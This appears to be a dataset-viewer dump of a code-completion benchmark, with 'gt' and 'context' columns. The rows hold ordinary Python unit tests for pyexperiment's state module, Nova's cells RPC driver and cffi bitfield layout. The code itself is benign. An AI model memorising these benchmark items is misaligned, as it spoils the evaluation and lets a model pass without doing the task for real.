gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
"""Tests the state module of pyexperiment
Written by Peter Duerr
"""
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
import unittest
import tempfile
import os
import io
import six
import shutil
import multiprocessing
import numpy as np
import lockfile
from time import sleep
from datetime import datetime
# For python2.x compatibility
from six.moves import range # pylint: disable=redefined-builtin, import-error
from pyexperiment import state
from pyexperiment.State import StateHandler
from pyexperiment.utils.stdout_redirector import stdout_redirector
class StateTester(unittest.TestCase):
"""ABC for state's test fixtures
"""
def setUp(self):
"""Setup test fixture
"""
self.list_val = [1, 2, 'a', 1.2]
self.dict_val = {'a': 1, 1: 2.3}
self.int_val = 123
def tearDown(self):
"""Teardown test fixture
"""
state.reset_instance()
def _setup_basic_state(self):
"""Setup test fixture
"""
state['list'] = self.list_val
state['dict'] = self.dict_val
state['values.int'] = self.int_val
class TestBasicState(StateTester):
"""Test basic functionality of pyexperiment's state
"""
def test_set_get_first_level(self):
"""Test setting, getting state at the lowest level
"""
state['a'] = 123
self.assertEqual(state['a'], 123)
def test_set_get_higher_levels(self):
"""Test setting, getting state at the higher levels
"""
state['a.b'] = 123
state['c.d.e'] = 345
self.assertEqual(state['a.b'], 123)
self.assertEqual(state['c.d.e'], 345)
def test_get_section(self):
"""Test getting a section of the state
"""
state['a.a'] = 12
state['a.b'] = 13
state['c'] = 24
self.assertIn('a', state)
section_a = state['a']
self.assertIn('a', section_a)
self.assertIn('b', section_a)
self.assertNotIn('c', section_a)
self.assertEqual(section_a['a'], 12)
self.assertEqual(section_a['b'], 13)
def test_get_inexistent(self):
"""Test getting non-existent value
"""
self.assertRaises(KeyError, state.__getitem__, 'a')
def test_show(self):
"""Test showing the state
"""
state['a.b'] = 12
state['bla.bli'] = 13
buf = io.StringIO()
with stdout_redirector(buf):
state.show()
self.assertNotEqual(len(buf.getvalue()), 0)
self.assertRegexpMatches(buf.getvalue(), r"\[a\]")
self.assertRegexpMatches(buf.getvalue(), r"\[bla\]")
self.assertRegexpMatches(buf.getvalue(), r"b")
self.assertRegexpMatches(buf.getvalue(), r"bli")
self.assertRegexpMatches(buf.getvalue(), r"12")
self.assertRegexpMatches(buf.getvalue(), r"13")
def test_in_lazy(self):
"""Test checking for an attribute in a lazily loaded state
"""
self._setup_basic_state()
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('list', state)
state.load(temp.name, lazy=True)
self.assertIn('list', state)
def test_setting_increases_length(self):
"""Test setting items increases length
"""
self.assertEqual(len(state), 0)
state['a'] = 12
self.assertEqual(len(state), 1)
state['c.d.f'] = 13
self.assertEqual(len(state), 2)
def test_delete_from_state(self):
"""Test deleting a value from the state
"""
state['list'] = [1, 2, 3]
self.assertIn('list', state)
del state['list']
self.assertNotIn('list', state)
def test_delete_reduces_length(self):
"""Test deleting a value from the state reduces the length
"""
self._setup_basic_state()
no_items = len(state)
del state['list']
self.assertEqual(len(state), no_items - 1)
def test_delete_removes_key(self):
"""Test deleting a value from the state removes the item
"""
self._setup_basic_state()
del state['list']
self.assertNotIn('list', state.keys())
def test_show_lazy(self):
"""Test showing the state lazily loaded
"""
state['a.b'] = 12
buf = io.StringIO()
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state['a.b'] = 13
state.load(temp.name, lazy=True)
with stdout_redirector(buf):
state.show()
self.assertNotEqual(len(buf.getvalue()), 0)
self.assertRegexpMatches(buf.getvalue(), r"\[a\]")
self.assertRegexpMatches(buf.getvalue(), r"b")
self.assertRegexpMatches(buf.getvalue(), r"12")
if six.PY2:
self.assertNotRegexpMatches(buf.getvalue(), r"13")
elif six.PY3:
self.assertNotRegex( # pylint: disable=E1101
buf.getvalue(), r"13")
else:
raise RuntimeError("Python version not supported")
def test_show_nonexisting_noraise(self):
"""Test showing a state that does not exist
"""
buf = io.StringIO()
with stdout_redirector(buf):
state.show()
self.assertEqual(len(buf.getvalue()), 0)
def test_load_nonexisting(self):
"""Test loading a state that does not exist with error flag default
"""
temp = tempfile.NamedTemporaryFile(delete=False)
os.remove(temp.name)
self.assertRaises(IOError, state.load, temp.name, lazy=False)
def test_load_nonexisting_lazy(self):
"""Test loading a state that does not exist with error flag default
"""
temp = tempfile.NamedTemporaryFile(delete=False)
os.remove(temp.name)
self.assertRaises(IOError, state.load, temp.name, lazy=True)
def test_load_nonexisting_noraise(self):
"""Test loading a state that does not exist with error flag True
"""
temp = tempfile.NamedTemporaryFile(delete=False)
os.remove(temp.name)
state.load(temp.name, lazy=False, raise_error=False)
self.assertEqual(len(state), 0)
def test_load_nonexist_lazy_noraise(self):
"""Test loading a state that does not exist with error flag default
"""
temp = tempfile.NamedTemporaryFile(delete=False)
os.remove(temp.name)
state.load(temp.name, lazy=True, raise_error=False)
self.assertNotIn('foo', state)
def test_empty_keys(self):
"""Test getting the keys in an empty state
"""
self.assertEqual(len(state.keys()), 0)
def test_keys(self):
"""Test getting the keys in a state
"""
self._setup_basic_state()
self.assertEqual(len(state.keys()), 3)
self.assertIn('list', state.keys())
self.assertIn('dict', state.keys())
self.assertIn('values.int', state.keys())
def test_iterate_uninitialized(self):
"""Make sure iterating uninitialized state returns empty generator
"""
self.assertEqual(list(iter(state)), [])
class TestStateIO(StateTester):
"""Test save/load functionality of pyexperiment's state
"""
def test_save_load_file(self):
"""Test saving file and reloading yields identical values
"""
self._setup_basic_state()
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
# Write bogus info to state
state['list'] = 'foo'
state['dict'] = 'bar'
state['values.int'] = 43
state.load(temp.name, lazy=False)
# Get loaded data
list_val = state['list']
dict_val = state['dict']
int_val = state['values.int']
self.assertEqual(self.list_val, list_val)
self.assertEqual(self.dict_val, dict_val)
self.assertEqual(self.int_val, int_val)
def test_load_wo_filenamee(self):
"""Test loading state without passing a filename
"""
self.assertRaises(RuntimeError, state.load)
def test_save_load_file_lazy(self):
"""Test saving file and reloading lazily yields identical values
"""
self._setup_basic_state()
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
# Write bogus info to state
state['list'] = 'foo'
state['dict'] = 'bar'
state['values.int'] = 43
state.load(temp.name, lazy=True)
list_val = state['list']
dict_val = state['dict']
int_val = state['values.int']
self.assertEqual(self.list_val, list_val)
self.assertEqual(self.dict_val, dict_val)
self.assertEqual(self.int_val, int_val)
def test_get_section_lazy(self):
"""Test getting a section of the state lazily
"""
state['a.a'] = 12
state['a.b'] = 13
state['c'] = 24
self.assertIn('a', state)
section_a = state['a']
self.assertIn('a', section_a)
self.assertIn('b', section_a)
self.assertNotIn('c', section_a)
self.assertEqual(section_a['a'], 12)
self.assertEqual(section_a['b'], 13)
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
state.load(temp.name)
self.assertIn('a', state)
section_a = state['a']
self.assertIn('a', section_a)
self.assertIn('b', section_a)
self.assertNotIn('c', section_a)
self.assertEqual(section_a['a'], 12)
self.assertEqual(section_a['b'], 13)
def test_get_section_lazy2(self):
"""Test getting directly a section of the state lazily
"""
state['a.b'] = 12
self.assertIn('a.b', state)
self.assertEqual(state['a.b'], 12)
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
state.load(temp.name)
self.assertIn('a.b', state)
self.assertEqual(state['a.b'], 12)
def test_lazy_really_lazy(self):
"""Test lazy loading is really lazy
"""
self._setup_basic_state()
temp = tempfile.NamedTemporaryFile(delete=False)
temp2 = tempfile.NamedTemporaryFile(delete=False)
state.save(temp.name)
# Write bogus info to state
state['list'] = 'foo'
state['values.int'] = 43
# This should only load the keys
state.load(temp.name, lazy=True)
self.assertEqual(len(state.keys()), 3)
# This should raise an error
shutil.move(temp.name, temp2.name)
self.assertRaises(IOError, state.__getitem__, 'list')
shutil.copyfile(temp2.name, temp.name)
# Now it should work
list_val = state['list']
self.assertEqual(self.list_val, list_val)
# This should raise another error
shutil.move(temp.name, temp2.name)
self.assertRaises(IOError, state.__getitem__, 'values.int')
shutil.copyfile(temp2.name, temp.name)
# This should work again
int_val = state['values.int']
self.assertEqual(self.int_val, int_val)
os.remove(temp.name)
os.remove(temp2.name)
def test_save_rollover(self):
"""Test saving file with rollover
"""
# Write some stuff to the state
state['a'] = (-1) ** 2
state['b'] = (-1) ** 3
state['c'] = 41
with tempfile.NamedTemporaryFile() as temp:
# Save original state
state.save(temp.name, rotate_n_state_files=2)
for i in range(10):
# Write bogus info to state
state['a'] = i ** 2
state['b'] = i ** 3
state['c'] = 42 + i
state.save(temp.name, rotate_n_state_files=2)
# Load last file and check contents
state.load(temp.name + ".1", lazy=True)
self.assertEqual(state['a'], (i - 1) ** 2)
self.assertEqual(state['b'], (i - 1) ** 3)
self.assertEqual(state['c'], 42 + (i - 1))
if i > 0:
# Load previous to last file and check contents
state.load(temp.name + ".2", lazy=True)
self.assertEqual(state['a'], (i - 2) ** 2)
self.assertEqual(state['b'], (i - 2) ** 3)
self.assertEqual(state['c'], 42 + (i - 2))
# Load current state and check contents
state.load(temp.name, lazy=True)
self.assertEqual(state['a'], i ** 2)
self.assertEqual(state['b'], i ** 3)
self.assertEqual(state['c'], 42 + i)
# Remove temp files
os.remove(temp.name + ".1")
os.remove(temp.name + ".2")
def test_need_saving(self):
"""Test the state.need_saving method
"""
self._setup_basic_state()
self.assertTrue(state.need_saving())
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
self.assertFalse(state.need_saving())
state['list'] = 'foo2'
self.assertTrue(state.need_saving())
def test_no_unnecessary_save(self):
"""Test saving the state only saves when necessary
"""
self.assertFalse(state.need_saving())
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
self.assertEqual(os.stat(temp.name).st_size, 0)
self.assertFalse(state.need_saving())
state['bla'] = 'bla'
self.assertTrue(state.need_saving())
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
self.assertNotEqual(os.stat(temp.name).st_size, 0)
self.assertFalse(state.need_saving())
def test_saving_deleted_value(self):
"""Test saving really deletes entry
"""
state['a'] = 12
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
state.load(temp.name)
self.assertIn('a', state)
del state['a']
self.assertNotIn('a', state)
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
state.load(temp.name)
self.assertNotIn('a', state)
def test_saving_unloaded_value(self):
"""Test saving does not delete unloaded values
"""
state['a'] = 12
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
state.load(temp.name)
state['b'] = 12
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
self.assertNotIn('b', state)
state.load(temp.name)
self.assertIn('a', state)
self.assertIn('b', state)
class TestStateEfficientIO(StateTester):
"""Test save/load functionality of pyexperiment's state for numpy arrays
"""
def tearDown(self):
"""Clean up after tests
"""
state.reset_instance()
def test_saving_loading_np_array(self):
"""Test saving and loading a numpy array
"""
random = np.random.rand(100)
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random', state)
state.load(temp.name, lazy=False)
self.assertTrue((random == state['random']).all())
def test_saving_loading_np_array2(self):
"""Test saving and loading numpy arrays of higher dimension
"""
random1 = np.random.rand(321, 123)
random2 = np.random.randint(0, 100, (123, 345))
state['random1'] = random1
state['random2'] = random2
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random1', state)
self.assertNotIn('random2', state)
state.load(temp.name, lazy=False)
self.assertTrue((random1 == state['random1']).all())
self.assertTrue((random2 == state['random2']).all())
self.assertEqual(state['random1'].shape, random1.shape)
self.assertEqual(state['random2'].shape, random2.shape)
self.assertEqual(state['random1'].dtype, random1.dtype)
self.assertEqual(state['random2'].dtype, random2.dtype)
def test_saving_loading_lazy_array(self):
"""Test saving and loading a numpy array
"""
random = np.random.rand(100)
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random', state)
state.load(temp.name)
self.assertTrue((random == state['random']).all())
def test_saving_list_performance(self):
"""Test saving a list and make sure it's reasonably fast
"""
random = np.random.randint(0, 255, 1024*1024).tolist()
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
tic = datetime.now()
state.save(temp.name)
toc = datetime.now()
self.assertTrue((toc - tic).total_seconds() < 0.5)
def test_loading_list_performance(self):
"""Test loading a list and make sure it's reasonably fast
"""
random = np.random.randint(0, 255, 1024*1024).tolist()
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random', state)
tic = datetime.now()
state.load(temp.name)
toc = datetime.now()
self.assertTrue((toc - tic).total_seconds() < 0.5)
def test_saving_numpy_performance(self):
"""Test saving a numpy array and make sure it's reasonably fast
"""
random = np.array(
np.random.randint(0, 255, 1024*1024))
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
tic = datetime.now()
state.save(temp.name)
toc = datetime.now()
self.assertTrue((toc - tic).total_seconds() < 0.5)
def test_loading_numpy_performance(self):
"""Test loading a numpy array and make sure it's reasonably fast
"""
random = np.array(
np.random.randint(0, 255, 1024*1024))
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random', state)
tic = datetime.now()
state.load(temp.name)
toc = datetime.now()
self.assertTrue((toc - tic).total_seconds() < 0.5)
class TestStateHandler(unittest.TestCase):
"""Test the state's StateHandler
"""
def tearDown(self):
"""Clean up after the test
"""
state.reset_instance()
def test_with_block_does_not_load(self):
"""Test the basic with-block of the StateHandler does not load anything
"""
state['a'] = 1
self.assertEqual(len(state), 1)
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name):
self.assertEqual(len(state), 0)
def test_with_block_does_not_save(self):
"""Test the basic with-block of the StateHandler does not save anything
"""
state['a'] = 1
self.assertEqual(len(state), 1)
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name):
state['a'] = 42
state.reset_instance()
state.load(temp.name)
self.assertEqual(state['a'], 1)
def test_with_block_does_load(self):
"""Test the with-block of the StateHandler loads if required
"""
state['a'] = 123
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name, load=True):
self.assertEqual(len(state), 1)
self.assertEqual(state['a'], 123)
def test_with_block_does_save(self):
"""Test the with-block of the StateHandler saves if required
"""
state['a'] = 1
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name, save=True):
state['a'] = 42
state.reset_instance()
state.load(temp.name)
self.assertEqual(state['a'], 42)
def test_with_block_locks(self):
"""Test the with-block of the StateHandler locks the state
"""
state['a'] = 123
with tempfile.NamedTemporaryFile() as temp:
def other_op():
"""Function to run in another process"""
StateHandler.STATE_LOCK_TIMEOUT = 0.001
other_handler = StateHandler(temp.name, load=True)
self.assertRaises(RuntimeError,
other_handler.__enter__)
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name, load=True):
process = multiprocessing.Process(target=other_op)
process.start()
process.join()
def test_other_process_locks(self):
"""Test locking the state in another process locks
"""
with tempfile.NamedTemporaryFile() as temp:
def other_op(queue):
"""Lock the lockfile, then wait for poison pill
"""
lockfile.FileLock(temp.name).acquire()
while queue.empty():
sleep(0.01)
lockfile.FileLock(temp.name).release()
queue = multiprocessing.Queue()
process = multiprocessing.Process(target=other_op,
args=(queue,))
process.start()
while not lockfile.FileLock(temp.name).is_locked():
sleep(0.01)
StateHandler.STATE_LOCK_TIMEOUT = 0.001
handler = StateHandler(temp.name, load=False)
self.assertRaises(RuntimeError, handler.lock)
queue.put(None)
process.join()
if __name__ == '__main__':
unittest.main()
|
|
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Cells RPC Communication Driver
"""
import mock
from mox3 import mox
from oslo_config import cfg
import oslo_messaging
from nova.cells import messaging
from nova.cells import rpc_driver
from nova import context
from nova import rpc
from nova import test
from nova.tests.unit.cells import fakes
CONF = cfg.CONF
CONF.import_opt('rpc_driver_queue_base', 'nova.cells.rpc_driver',
group='cells')
class CellsRPCDriverTestCase(test.NoDBTestCase):
"""Test case for Cells communication via RPC."""
def setUp(self):
super(CellsRPCDriverTestCase, self).setUp()
fakes.init(self)
self.ctxt = context.RequestContext('fake', 'fake')
self.driver = rpc_driver.CellsRPCDriver()
def test_start_servers(self):
self.flags(rpc_driver_queue_base='cells.intercell42', group='cells')
fake_msg_runner = fakes.get_message_runner('api-cell')
class FakeInterCellRPCDispatcher(object):
def __init__(_self, msg_runner):
self.assertEqual(fake_msg_runner, msg_runner)
self.stubs.Set(rpc_driver, 'InterCellRPCDispatcher',
FakeInterCellRPCDispatcher)
self.mox.StubOutWithMock(rpc, 'get_server')
for message_type in messaging.MessageRunner.get_message_types():
topic = 'cells.intercell42.' + message_type
target = oslo_messaging.Target(topic=topic, server=CONF.host)
endpoints = [mox.IsA(FakeInterCellRPCDispatcher)]
rpcserver = self.mox.CreateMockAnything()
rpc.get_server(target, endpoints=endpoints).AndReturn(rpcserver)
rpcserver.start()
self.mox.ReplayAll()
self.driver.start_servers(fake_msg_runner)
def test_stop_servers(self):
call_info = {'stopped': []}
class FakeRPCServer(object):
def stop(self):
call_info['stopped'].append(self)
fake_servers = [FakeRPCServer() for x in xrange(5)]
self.driver.rpc_servers = fake_servers
self.driver.stop_servers()
self.assertEqual(fake_servers, call_info['stopped'])
def test_create_transport_once(self):
# should only construct each Transport once
rpcapi = self.driver.intercell_rpcapi
transport_url = 'amqp://fakeurl'
next_hop = fakes.FakeCellState('cellname')
next_hop.db_info['transport_url'] = transport_url
# first call to _get_transport creates a oslo.messaging.Transport obj
with mock.patch.object(oslo_messaging, 'get_transport') as get_trans:
transport = rpcapi._get_transport(next_hop)
get_trans.assert_called_once_with(rpc_driver.CONF, transport_url,
rpc.TRANSPORT_ALIASES)
self.assertIn(transport_url, rpcapi.transports)
self.assertEqual(transport, rpcapi.transports[transport_url])
# subsequent calls should return the pre-created Transport obj
transport2 = rpcapi._get_transport(next_hop)
self.assertEqual(transport, transport2)
def test_send_message_to_cell_cast(self):
msg_runner = fakes.get_message_runner('api-cell')
cell_state = fakes.get_cell_state('api-cell', 'child-cell2')
message = messaging._TargetedMessage(msg_runner,
self.ctxt, 'fake', {}, 'down', cell_state, fanout=False)
expected_server_params = {'hostname': 'rpc_host2',
'password': 'password2',
'port': 3092,
'username': 'username2',
'virtual_host': 'rpc_vhost2'}
expected_url = ('rabbit://%(username)s:%(password)s@'
'%(hostname)s:%(port)d/%(virtual_host)s' %
expected_server_params)
def check_transport_url(cell_state):
return cell_state.db_info['transport_url'] == expected_url
rpcapi = self.driver.intercell_rpcapi
rpcclient = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(rpcapi, '_get_client')
rpcapi._get_client(
mox.Func(check_transport_url),
'cells.intercell.targeted').AndReturn(rpcclient)
rpcclient.cast(mox.IgnoreArg(), 'process_message',
message=message.to_json())
self.mox.ReplayAll()
self.driver.send_message_to_cell(cell_state, message)
def test_send_message_to_cell_fanout_cast(self):
msg_runner = fakes.get_message_runner('api-cell')
cell_state = fakes.get_cell_state('api-cell', 'child-cell2')
message = messaging._TargetedMessage(msg_runner,
self.ctxt, 'fake', {}, 'down', cell_state, fanout=True)
expected_server_params = {'hostname': 'rpc_host2',
'password': 'password2',
'port': 3092,
'username': 'username2',
'virtual_host': 'rpc_vhost2'}
expected_url = ('rabbit://%(username)s:%(password)s@'
'%(hostname)s:%(port)d/%(virtual_host)s' %
expected_server_params)
def check_transport_url(cell_state):
return cell_state.db_info['transport_url'] == expected_url
rpcapi = self.driver.intercell_rpcapi
rpcclient = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(rpcapi, '_get_client')
rpcapi._get_client(
mox.Func(check_transport_url),
'cells.intercell.targeted').AndReturn(rpcclient)
rpcclient.prepare(fanout=True).AndReturn(rpcclient)
rpcclient.cast(mox.IgnoreArg(), 'process_message',
message=message.to_json())
self.mox.ReplayAll()
self.driver.send_message_to_cell(cell_state, message)
def test_rpc_topic_uses_message_type(self):
self.flags(rpc_driver_queue_base='cells.intercell42', group='cells')
msg_runner = fakes.get_message_runner('api-cell')
cell_state = fakes.get_cell_state('api-cell', 'child-cell2')
message = messaging._BroadcastMessage(msg_runner,
self.ctxt, 'fake', {}, 'down', fanout=True)
message.message_type = 'fake-message-type'
expected_server_params = {'hostname': 'rpc_host2',
'password': 'password2',
'port': 3092,
'username': 'username2',
'virtual_host': 'rpc_vhost2'}
expected_url = ('rabbit://%(username)s:%(password)s@'
'%(hostname)s:%(port)d/%(virtual_host)s' %
expected_server_params)
def check_transport_url(cell_state):
return cell_state.db_info['transport_url'] == expected_url
rpcapi = self.driver.intercell_rpcapi
rpcclient = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(rpcapi, '_get_client')
rpcapi._get_client(
mox.Func(check_transport_url),
'cells.intercell42.fake-message-type').AndReturn(rpcclient)
rpcclient.prepare(fanout=True).AndReturn(rpcclient)
rpcclient.cast(mox.IgnoreArg(), 'process_message',
message=message.to_json())
self.mox.ReplayAll()
self.driver.send_message_to_cell(cell_state, message)
def test_process_message(self):
msg_runner = fakes.get_message_runner('api-cell')
dispatcher = rpc_driver.InterCellRPCDispatcher(msg_runner)
message = messaging._BroadcastMessage(msg_runner,
self.ctxt, 'fake', {}, 'down', fanout=True)
call_info = {}
def _fake_message_from_json(json_message):
call_info['json_message'] = json_message
self.assertEqual(message.to_json(), json_message)
return message
def _fake_process():
call_info['process_called'] = True
self.stubs.Set(msg_runner, 'message_from_json',
_fake_message_from_json)
self.stubs.Set(message, 'process', _fake_process)
dispatcher.process_message(self.ctxt, message.to_json())
self.assertEqual(message.to_json(), call_info['json_message'])
self.assertTrue(call_info['process_called'])
|
|
import py, sys, platform
import pytest
from testing.cffi0 import backend_tests, test_function, test_ownlib
from cffi import FFI
import _cffi_backend
class TestFFI(backend_tests.BackendTests,
test_function.TestFunction,
test_ownlib.TestOwnLib):
TypeRepr = "<ctype '%s'>"
@staticmethod
def Backend():
return _cffi_backend
def test_not_supported_bitfield_in_result(self):
ffi = FFI(backend=self.Backend())
ffi.cdef("struct foo_s { int a,b,c,d,e; int x:1; };")
e = py.test.raises(NotImplementedError, ffi.callback,
"struct foo_s foo(void)", lambda: 42)
assert str(e.value) == ("struct foo_s(*)(): "
"callback with unsupported argument or return type or with '...'")
def test_inspecttype(self):
ffi = FFI(backend=self.Backend())
assert ffi.typeof("long").kind == "primitive"
assert ffi.typeof("long(*)(long, long**, ...)").cname == (
"long(*)(long, long * *, ...)")
assert ffi.typeof("long(*)(long, long**, ...)").ellipsis is True
def test_new_handle(self):
ffi = FFI(backend=self.Backend())
o = [2, 3, 4]
p = ffi.new_handle(o)
assert ffi.typeof(p) == ffi.typeof("void *")
assert ffi.from_handle(p) is o
assert ffi.from_handle(ffi.cast("char *", p)) is o
py.test.raises(RuntimeError, ffi.from_handle, ffi.NULL)
class TestBitfield:
def check(self, source, expected_ofs_y, expected_align, expected_size):
# NOTE: 'expected_*' is the numbers expected from GCC.
# The numbers expected from MSVC are not explicitly written
# in this file, and will just be taken from the compiler.
ffi = FFI()
ffi.cdef("struct s1 { %s };" % source)
ctype = ffi.typeof("struct s1")
# verify the information with gcc
ffi1 = FFI()
ffi1.cdef("""
static const int Gofs_y, Galign, Gsize;
struct s1 *try_with_value(int fieldnum, long long value);
""")
fnames = [name for name, cfield in ctype.fields
if name and cfield.bitsize > 0]
setters = ['case %d: s.%s = value; break;' % iname
for iname in enumerate(fnames)]
lib = ffi1.verify("""
struct s1 { %s };
struct sa { char a; struct s1 b; };
#define Gofs_y offsetof(struct s1, y)
#define Galign offsetof(struct sa, b)
#define Gsize sizeof(struct s1)
struct s1 *try_with_value(int fieldnum, long long value)
{
static struct s1 s;
memset(&s, 0, sizeof(s));
switch (fieldnum) { %s }
return &s;
}
""" % (source, ' '.join(setters)))
if sys.platform == 'win32':
expected_ofs_y = lib.Gofs_y
expected_align = lib.Galign
expected_size = lib.Gsize
else:
assert (lib.Gofs_y, lib.Galign, lib.Gsize) == (
expected_ofs_y, expected_align, expected_size)
# the real test follows
assert ffi.offsetof("struct s1", "y") == expected_ofs_y
assert ffi.alignof("struct s1") == expected_align
assert ffi.sizeof("struct s1") == expected_size
# compare the actual storage of the two
for name, cfield in ctype.fields:
if cfield.bitsize < 0 or not name:
continue
if int(ffi.cast(cfield.type, -1)) == -1: # signed
min_value = -(1 << (cfield.bitsize-1))
max_value = (1 << (cfield.bitsize-1)) - 1
else:
min_value = 0
max_value = (1 << cfield.bitsize) - 1
for t in [1, 2, 4, 8, 16, 128, 2813, 89728, 981729,
-1,-2,-4,-8,-16,-128,-2813,-89728,-981729]:
if min_value <= t <= max_value:
self._fieldcheck(ffi, lib, fnames, name, t)
def _fieldcheck(self, ffi, lib, fnames, name, value):
s = ffi.new("struct s1 *")
setattr(s, name, value)
assert getattr(s, name) == value
raw1 = ffi.buffer(s)[:]
t = lib.try_with_value(fnames.index(name), value)
raw2 = ffi.buffer(t, len(raw1))[:]
assert raw1 == raw2
def test_bitfield_basic(self):
self.check("int a; int b:9; int c:20; int y;", 8, 4, 12)
self.check("int a; short b:9; short c:7; int y;", 8, 4, 12)
self.check("int a; short b:9; short c:9; int y;", 8, 4, 12)
def test_bitfield_reuse_if_enough_space(self):
self.check("int a:2; char y;", 1, 4, 4)
self.check("int a:1; char b ; int c:1; char y;", 3, 4, 4)
self.check("int a:1; char b:8; int c:1; char y;", 3, 4, 4)
self.check("char a; int b:9; char y;", 3, 4, 4)
self.check("char a; short b:9; char y;", 4, 2, 6)
self.check("int a:2; char b:6; char y;", 1, 4, 4)
self.check("int a:2; char b:7; char y;", 2, 4, 4)
self.check("int a:2; short b:15; char c:2; char y;", 5, 4, 8)
self.check("int a:2; char b:1; char c:1; char y;", 1, 4, 4)
@pytest.mark.skipif("platform.machine().startswith(('arm', 'aarch64'))")
def test_bitfield_anonymous_no_align(self):
L = FFI().alignof("long long")
self.check("char y; int :1;", 0, 1, 2)
self.check("char x; int z:1; char y;", 2, 4, 4)
self.check("char x; int :1; char y;", 2, 1, 3)
self.check("char x; long long z:48; char y;", 7, L, 8)
self.check("char x; long long :48; char y;", 7, 1, 8)
self.check("char x; long long z:56; char y;", 8, L, 8 + L)
self.check("char x; long long :56; char y;", 8, 1, 9)
self.check("char x; long long z:57; char y;", L + 8, L, L + 8 + L)
self.check("char x; long long :57; char y;", L + 8, 1, L + 9)
@pytest.mark.skipif(
"not platform.machine().startswith(('arm', 'aarch64'))")
def test_bitfield_anonymous_align_arm(self):
L = FFI().alignof("long long")
self.check("char y; int :1;", 0, 4, 4)
self.check("char x; int z:1; char y;", 2, 4, 4)
self.check("char x; int :1; char y;", 2, 4, 4)
self.check("char x; long long z:48; char y;", 7, L, 8)
self.check("char x; long long :48; char y;", 7, 8, 8)
self.check("char x; long long z:56; char y;", 8, L, 8 + L)
self.check("char x; long long :56; char y;", 8, L, 8 + L)
self.check("char x; long long z:57; char y;", L + 8, L, L + 8 + L)
self.check("char x; long long :57; char y;", L + 8, L, L + 8 + L)
@pytest.mark.skipif("platform.machine().startswith(('arm', 'aarch64'))")
def test_bitfield_zero(self):
L = FFI().alignof("long long")
self.check("char y; int :0;", 0, 1, 4)
self.check("char x; int :0; char y;", 4, 1, 5)
self.check("char x; int :0; int :0; char y;", 4, 1, 5)
self.check("char x; long long :0; char y;", L, 1, L + 1)
self.check("short x, y; int :0; int :0;", 2, 2, 4)
self.check("char x; int :0; short b:1; char y;", 5, 2, 6)
self.check("int a:1; int :0; int b:1; char y;", 5, 4, 8)
@pytest.mark.skipif(
"not platform.machine().startswith(('arm', 'aarch64'))")
def test_bitfield_zero_arm(self):
L = FFI().alignof("long long")
self.check("char y; int :0;", 0, 4, 4)
self.check("char x; int :0; char y;", 4, 4, 8)
self.check("char x; int :0; int :0; char y;", 4, 4, 8)
self.check("char x; long long :0; char y;", L, 8, L + 8)
self.check("short x, y; int :0; int :0;", 2, 4, 4)
self.check("char x; int :0; short b:1; char y;", 5, 4, 8)
self.check("int a:1; int :0; int b:1; char y;", 5, 4, 8)
def test_error_cases(self):
ffi = FFI()
py.test.raises(TypeError,
'ffi.cdef("struct s1 { float x:1; };"); ffi.new("struct s1 *")')
py.test.raises(TypeError,
'ffi.cdef("struct s2 { char x:0; };"); ffi.new("struct s2 *")')
py.test.raises(TypeError,
'ffi.cdef("struct s3 { char x:9; };"); ffi.new("struct s3 *")')
def test_struct_with_typedef(self):
ffi = FFI()
ffi.cdef("typedef struct { float x; } foo_t;")
p = ffi.new("foo_t *", [5.2])
assert repr(p).startswith("<cdata 'foo_t *' ")
def test_struct_array_no_length(self):
ffi = FFI()
ffi.cdef("struct foo_s { int x; int a[]; };")
p = ffi.new("struct foo_s *", [100, [200, 300, 400]])
assert p.x == 100
assert ffi.typeof(p.a) is ffi.typeof("int *") # no length available
assert p.a[0] == 200
assert p.a[1] == 300
assert p.a[2] == 400
